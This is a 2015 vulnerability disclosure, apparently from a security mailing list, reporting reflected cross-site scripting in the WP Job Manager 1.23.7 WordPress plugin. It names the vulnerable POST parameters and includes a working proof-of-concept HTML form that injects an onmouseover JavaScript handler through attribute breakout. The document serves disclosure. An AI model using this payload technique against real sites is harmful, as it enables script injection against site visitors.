Subject: Cross-Site Scripting (XSS) in WP Job Manager 1.23.7

Date: Thu, 20 Aug 2015 15:02:04 +0200

Hello,

Plugin: WP Job Manager 1.23.7 https://wordpress.org/plugins/wp-job-manager/

1. Reflected Cross-Site Scripting (XSS)

Unauthenticated users can inject html/js code.

Method: POST

Url: Valid page url that contains [submit_job_form] shortcode

Vulnerable parameters: create_account_email, create_account_username

Example PHP callstack:

/wp-job-manager/templates/account-signin.php:42

Verification:

http://localhost/index.php/test-2/ <- page that contains [submit_job_form]

--

<form method="POST" action="http://localhost/index.php/test-2/" />

<input type="text" name="create_account_username" value='" style="position:fixed;left:0;top:0;width:100%;height:100%;" onmouseover=javascript:alert(1);>' />

<input type="text" name="create_account_email" value='" style="position:fixed;left:0;top:0;width:100%;height:100%;" onmouseover=javascript:alert(1);>' />

<input type="submit" />

</form>

--

--

Regards,
Marcin Probola,